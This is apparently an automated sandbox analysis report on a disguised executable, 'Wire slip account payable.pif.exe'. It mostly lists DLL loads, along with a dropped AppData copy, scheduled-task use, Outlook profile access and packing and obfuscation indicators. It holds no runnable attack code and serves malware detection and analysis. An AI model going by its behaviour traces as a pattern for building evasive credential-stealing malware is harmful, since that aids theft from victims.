                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: Wire slip account payable.pif.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Wire slip account payable.pif.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, gL074BhmJSaIe9Ktd1.cs.Net Code: zcNkPvRgVA System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, gL074BhmJSaIe9Ktd1.cs.Net Code: zcNkPvRgVA System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 0_2_074976A0 push esp; ret 0_2_074976A1
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 0_2_074950B1 push EB900745h; ret 0_2_074950BD
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 0_2_07498DB0 push esp; iretd 0_2_07498DB9
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_011BFAD0 push esp; ret 8_2_011BFAF9
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_06940263 push esp; iretd 8_2_06940269
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_06949B53 push es; ret 8_2_06949B60
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_069498DB push 8B516C17h; iretd 8_2_069498E0
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_0694996B push 8B516C17h; iretd 8_2_06949974
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 9_2_06C146CC push es; retn 0006h9_2_06C146DA
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 9_2_06C176A0 push esp; ret 9_2_06C176A1
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 9_2_06C150B1 push EB9006BDh; ret 9_2_06C150BD
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 9_2_06C14808 push cs; retn 0006h9_2_06C14812
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 14_2_02E4FAD0 push esp; ret 14_2_02E4FAF9
                      Source: Wire slip account payable.pif.exeStatic PE information: section name: .text entropy: 7.942591197199076
                      Source: EQVRGq.exe.0.drStatic PE information: section name: .text entropy: 7.942591197199076
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, ODaaLEmxZhSc3dyCQm.csHigh entropy of concatenated method names: 'aU3Vgk3KuE', 'vwiVHDuh7R', 'QHxVZ2iZ1o', 'LRTVu1uIff', 'a6PVhqngai', 'vUWZWbB14T', 'Bs0Z5yE0RX', 'gpEZ3ZZX1s', 'hSFZcjy6sZ', 'OGeZThLCse'
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, jPw0qgzscD9FJa72lx.csHigh entropy of concatenated method names: 'gLwfv0j93H', 'hlufnkrMNu', 'rAgflIYoLM', 'BhpfmbJoGX', 'QRLfsXqsSH', 'fxZf9edMu4', 'Tw7fjCWtac', 'Lmufqn55fN', 'FvTfQRb4ql', 'NGWfydvahw'
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, RuSwETDEJQv2nUAfUA4.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ykVfFVPUc6', 'SDjf15p3T8', 'a9jfJdtH3X', 'uHhfrOLmBx', 'XUYfwI5vhr', 'MUmfaAdAZi', 'e21f2a9O0L'
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, pBxTATDDe0IEkvu86CL.csHigh entropy of concatenated method names: 'h7ofUM9lh3', 'L7Ufzl0mXK', 'WFwoEPdonK', 'Hq4oDC3VL3', 'q0AoX4jxxj', 'l0Aopg1SNa', 'L93okQ52js', 'Bpwogtmy3B', 'brKoSxLNY8', 'j0yoHtgx8T'
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, aIySoVaM59biZ07pMc.csHigh entropy of concatenated method names: 'ToString', 'YD0BFA0ifY', 'uNKBsLoFwP', 'SaYB6IGSO7', 'xKaB9xhFtv', 'xf9BjSoSXd', 'xZMBMFP1B4', 'nILBOS4SCN', 'pTXBi779mU', 'QKkBNOUREb'
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, oYrUFM59tbVRIsk3J0.csHigh entropy of concatenated method names: 'JvcLcxKAOT', 'VddLUEQ3i7', 'cv4REJ3AOv', 'XvKRDR4d5p', 'BS9LF6dMqR', 'krrL1bfMXN', 'MxvLJR6dFI', 'WY4LrEnQrN', 'BSjLwWKsmN', 'xB1LafCBqg'
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, rekgrBHhNjMSuwg2X1.csHigh entropy of concatenated method names: 'Dispose', 'c9vDTB3tp3', 'zeQXsMf2Z8', 'rQUdIpr0pb', 'qUZDU1GViN', 'PpNDzqJjFs', 'ProcessDialogKey', 'VCYXEvvLix', 'Lv7XDc8Tnn', 'TfmXXDDIIA'
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, lZY9ig2UjcAbtXWD2r.csHigh entropy of concatenated method names: 'yyTLCYCKnr', 'odbLdvCr9j', 'ToString', 'NOsLSkrn80', 'rjlLHha6mD', 'clDLbEACu1', 'AiILZD3bxp', 'GnTLVc9ZNV', 'C6qLus3CQa', 'pBdLh9nD5R'
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, pZVbNXDkSmntCVBLyS7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eDS408djmH', 'olK4fM4PZC', 'f294osP2xG', 'zuj44oo8gq', 'Eed4GBmsoW', 'inI4KIUQvU', 'lmF4quPnZn'
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, gNRWAGnXV8menB1Yeo.csHigh entropy of concatenated method names: 'qOXHrN3M3U', 'oeLHwV3318', 'QYaHan0Mli', 'EWQH2LVbC7', 'VgOHWwrfFN', 'jGHH5mfvAw', 'kajH3yqfkE', 'sgcHcXRkRV', 'gvlHT5cErU', 'lsQHUVofMs'
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, gL074BhmJSaIe9Ktd1.csHigh entropy of concatenated method names: 'd3TpgMAb2N', 'kB5pS8hIgE', 'sutpHIUnpP', 'A4mpbP4d5i', 'wfhpZSjIO2', 'Pd9pVSK2rc', 'fUqpum1tWZ', 'qC6phwaJNa', 'IS1p7XRvQ5', 'DnepCLJrSZ'
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, CTYMvBkFF3Ro4mtHA4.csHigh entropy of concatenated method names: 'pxbDuNRWAG', 'cV8DhmenB1', 'XawDCmJu97', 'KJ3DdO8IQj', 'dm1Dx65FDa', 'SLEDBxZhSc', 'njTgAV96U26JDjZu9j', 'vYaVdhMaAEnToVIVST', 'RgqDDeNTDs', 'DwKDphN2gd'
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, TdqXBTlawmJu97MJ3O.csHigh entropy of concatenated method names: 'zQTb81GNmm', 'GqJbvlbCWt', 'Xr9bnwwsSq', 'vLdbl4ZGPo', 'MLrbxZJW8X', 'rlobB8mYam', 'y5fbLCW7eo', 'iNmbRpFNgw', 'yKCb05p8bo', 'gFYbf5RCtA'
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, iGIEem3Xqp9vB3tp3R.csHigh entropy of concatenated method names: 'qpS0x9xNLr', 's8u0LpaoEH', 'wqW00F0tEk', 'S910oAYs2C', 'rmQ0GWqwtO', 'vrB0qtrAGZ', 'Dispose', 'NamRSdm9I6', 'ND4RHHLyUW', 'wV3RbQVD8J'
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, XFOAcwJ618FHIGWr3u.csHigh entropy of concatenated method names: 'mDsenSSHLE', 'yjqelaWwlE', 'Ymhemi71E9', 'ITTesoaMSd', 'P44e9YAJsd', 'oNQejHLSUt', 'AwNeOC1IZq', 'svTeifgrC9', 'FSSetLg6Eo', 'qGbeFdU3Hr'
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, xGhgXlOC1DK2px56Aa.csHigh entropy of concatenated method names: 'eV7uS3f3Td', 'uaUubO5l4R', 'CWkuVNWrHN', 'tOdVUKNULR', 'mB8VzsVlVG', 'lYiuE3lmpZ', 'WdAuD054dr', 'uHFuX83H5a', 'EckuphHQUY', 'gihukPEMwO'
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, NoJi4OX1MUCXoXy5rE.csHigh entropy of concatenated method names: 'B49P6S0HX', 'M7c8jHZmJ', 'gXYvox06X', 'SeeYsCIlR', 'mtjl380MW', 'B1rAI41En', 'DgWnHiB8Hnlwk5vNn9', 'oMmxM76FBoPeIKrmj9', 'pfZRTvmeK', 'MNwfRIshE'
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, DvvLixTOv7c8Tnn2fm.csHigh entropy of concatenated method names: 'ag80mIF09b', 'zZ20sZcnS9', 'Klm06Fw7Z2', 'zYB09J8DuH', 'pmx0jnuyn0', 'QiS0MPZwme', 'GI80O7jYm8', 'CmU0ifDS6W', 'P5y0NJZb8K', 'FZC0t3NqGO'
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, KJMhUlN5vVjFh8WZp0.csHigh entropy of concatenated method names: 'Xr4uQm5gj0', 'sHguyj1vyq', 'AF1uPUq4cQ', 'Iupu8R3sZ9', 'JkvuIrayYW', 'ftfuvaqHYC', 'x4KuYsSR2F', 'yUaunKDnfr', 'THfulcUUHP', 'nK4uACoetJ'
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, Y7rgi5955mXeMWQUG8.csHigh entropy of concatenated method names: 'P1CVqSiccR', 'PANVQ9oK96', 'ouZVPbmK2G', 'D6NV84Etso', 'IWVVvKrWoa', 'CWjVYROIyA', 'wfnVl543PY', 'zdDVAJF9Rw', 'I2yg7IbQTrSA4Ws3fCJ', 'jwBO6tb4GWPklLaEhXh'
